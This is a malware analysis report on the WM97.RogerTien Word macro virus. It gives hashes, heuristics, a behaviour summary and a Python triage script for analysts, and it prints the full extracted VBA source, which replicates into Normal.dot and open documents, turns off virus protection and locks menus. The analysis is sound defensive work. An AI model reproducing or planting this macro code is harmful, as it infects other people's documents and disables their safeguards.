Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 c9608408df86e3e2…

MALICIOUS

Office (OLE)

Size: 42.0 KB
Created: 1999-10-04 03:00:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9bd145c4fc503036feaf7ff00de56a9e
SHA-1: 9be6d1066895a0ece9b45e4ec98bf49cac0e9eb2
SHA-256: c9608408df86e3e217ff4c2400befdee04115ed9d637f9065797cd4336c89402
200 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 97-era (WM97-class) VBA macro virus that drives Word through the WordBasic compatibility object; its own comment names it WM97.RogerTien. It defines the full set of auto-executing procedures (AutoOpen, AutoExit, AutoNew, AutoExec) together with German-localised File menu hooks (DateiNeu, DateiOffnen, DateiSchliesen, DateiSpeichern, DateiSpeichernUnter, DateiDrucken), so the same code runs on open, close, new-document, save, save-as and print. On each run it re-enables auto macros (WordBasic.DisableAutoMacros 0), switches off Options.VirusProtection and the Cancel key, silences alerts, disables the Edit, Insert and Format command bars, then exports its own module to C:\RogerTien.sys and imports that file into whichever VBA project does not yet contain a RogerTien module (the active document or NormalTemplate), saving the result. That export/import is self-replication between documents and Normal.dot, not a second-stage download: no URL, shell or file-execution call appears in the recovered source. The macro also mutates itself by inserting random Rem lines into its own code module and writes Chr()-encoded author and comment strings into the document summary information. The ClamAV detection corroborates the static findings.
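As an added worked example (it is not part of this report's tooling or of the sample), the following Python script implements the checks an analyst would run over macro source dumped by olevba: it decodes the Chr()-concatenated strings, lists the auto-executing and German-localised command-hook procedures, and distinguishes the export-then-import replication pattern from a downloader. The input is a constructed, abridged excerpt of the listing on this page; the indicator names and the LOCALISED_COMMAND_HOOKS mapping are this script's own assumptions.

```python
"""Triage of VBA source dumped by olevba: decode Chr()-built strings and flag
the Word-97-era macro-virus behaviours seen in the RogerTien listing.
Added example for this report; indicator names are this script's own."""
import re

# Constructed excerpt, abridged from the extracted macro listing on the page.
SAMPLE_VBA = r"""
Attribute VB_Name = "RogerTien"
Sub AzCpMx5511()
WordBasic.DisableAutoMacros 0
With Options
.VirusProtection = False
End With
Current.VBProject.VBComponents("RogerTien").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
End Sub
Sub Th1874()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("RogerTien").Export "C:\RogerTien.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RogerTien" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
End With
NnPjVy8904OfKoPl148.VBComponents.Import "C:\RogerTien.sys"
If BmPkMr3950RnEuGe1874 = False Then NormalTemplate.Save
End Sub
Sub AutoOpen()
Call Th1874
End Sub
Sub AutoExit()
Call Th1874
End Sub
Sub DateiOffnen()
Dialogs(wdDialogFileOpen).Show
Call Th1874
End Sub
"""

CHR_CALL = re.compile(r"Chr\$?\((\d+)\)")
# Two or more Chr(n) calls glued with + or &: the literal only exists at run
# time, so a plain string scan of the source never sees it.
CHR_RUN = re.compile(r"Chr\$?\(\d+\)(?:\s*[+&]\s*Chr\$?\(\d+\))+")

# Word's auto-executing procedure names (same for WordBasic and VBA).
AUTO_EXEC = {"AutoExec", "AutoOpen", "AutoClose", "AutoNew", "AutoExit"}
# Assumed mapping of German-localised Word command names to their English
# equivalents; a macro with one of these names replaces that menu command.
LOCALISED_COMMAND_HOOKS = {
    "DateiNeu": "FileNew", "DateiOffnen": "FileOpen", "DateiSchliesen": "FileClose",
    "DateiSpeichern": "FileSave", "DateiSpeichernUnter": "FileSaveAs", "DateiDrucken": "FilePrint",
}
INDICATORS = [  # (name, pattern); patterns with a group capture the file path
    ("security_disable", re.compile(r"\.VirusProtection\s*=\s*False|DisableAutoMacros\s+0", re.I)),
    ("module_export", re.compile(r'VBComponents\([^)]*\)\.Export\s+"([^"]+)"', re.I)),
    ("module_import", re.compile(r'VBComponents\.Import\s+"([^"]+)"', re.I)),
    ("normal_template_write", re.compile(r"NormalTemplate\.Save\b", re.I)),
    ("self_modifying_code", re.compile(r"CodeModule\.InsertLines", re.I)),
    ("ui_lockout", re.compile(r'CommandBars\("[^"]+"\)\.Enabled\s*=\s*False', re.I)),
]


def decode_chr_run(run: str) -> str:
    """Evaluate one Chr(n) + Chr(m) ... run to the string it builds."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(run))


def decoded_strings(src: str) -> list[str]:
    return [decode_chr_run(m.group(0)) for m in CHR_RUN.finditer(src)]


def deobfuscate(src: str) -> str:
    """Rewrite each Chr() run in the source as the literal it evaluates to."""
    return CHR_RUN.sub(lambda m: '"' + decode_chr_run(m.group(0)) + '"', src)


def triage(src: str) -> dict:
    procs = re.findall(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(\w+)", src, re.M)
    hits = {}
    for name, rx in INDICATORS:
        found = [m.group(1) if rx.groups else m.group(0) for m in rx.finditer(src)]
        if found:
            hits[name] = found
    # Export to disk followed by import of the same file is the replication
    # path between a document and Normal.dot; a downloader would fetch a URL.
    replicates = bool(set(hits.get("module_export", [])) & set(hits.get("module_import", [])))
    return {
        "auto_exec": sorted(p for p in procs if p in AUTO_EXEC),
        "command_hooks": {p: LOCALISED_COMMAND_HOOKS[p] for p in procs if p in LOCALISED_COMMAND_HOOKS},
        "indicators": hits,
        "decoded_strings": decoded_strings(src),
        "replicates": replicates,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2, ensure_ascii=False))
```

Run against the excerpt, the decoded Author field reads "Jack Twoflower -=[LineZerØ Vx Team]=-" and the Comments suffix " by LiME 1.o", which is the kind of attribution string that never appears in the raw source; the `replicates` flag is set because the same path is both exported and imported, which is the evidence that separates this family from a macro downloader.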

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    An AutoOpen procedure runs as soon as the document is opened. This sample also defines AutoExit, AutoNew and AutoExec, so the same code runs on close, on new-document creation and at Word start-up once it has reached Normal.dot.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This rule's generic description states that no modern VBA project was recovered and no stronger macro-virus family marker was present; for this file that part does not hold, because olevba recovered a complete VBA project (the macros.bas artifact below). Treat the marker as analyst-facing evidence of old Word macro execution surface, not as a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                 Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)    4681 bytes
SHA-256: 1964cf9809fd7884e06528b4b3f63c1d0191253299ff7b586ac4b3f70eabb5dc
Detection
ClamAV: Doc.Trojan.Agnes-4
Obfuscation or payload: unlikely (tool verdict). Note that the source still builds its summary-information author and comment strings from Chr() calls and rewrites its own module with random Rem lines on every run, so signatures keyed on those literal strings or on exact module content will not match reliably.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "RogerTien"
Sub AzCpMx5511()
' -= [WM97.RogerTien] =-
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
s.VirusProtection = False
End With
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RogerTien").CodeModule.ProcCountLines("AzCpMx5511", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RogerTien").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
Call OfKoPl759
End Sub
Sub OfKoPl759()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Th1874()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RogerTien").Export "C:\RogerTien.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RogerTien" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 12094-Th-18745511-Hr.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RogerTien" Then BmPkMr3950RnEuGe1874 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RogerTien" Then CfAnHh759AzCpMx5511 = True
Next y
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = False Then Set NnPjVy8904OfKoPl148 = ActiveDocument.VBProject
If BmPkMr3950RnEuGe1874 = False And CfAnHh759AzCpMx5511 = True Then Set NnPjVy8904OfKoPl148 = NormalTemplate.VBProject
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = True Then GoTo Ende_
NnPjVy8904OfKoPl148.VBComponents.Import "C:\RogerTien.sys"
If CfAnHh759AzCpMx5511 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If BmPkMr3950RnEuGe1874 = False Then NormalTemplate.Save
Ende_:
Call AzCpMx5511
End Sub
Sub AutoOpen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExit()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoNew()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExec()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Th1874
Call AzCpMx5511
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFilePrint).Show
End Sub
... (truncated)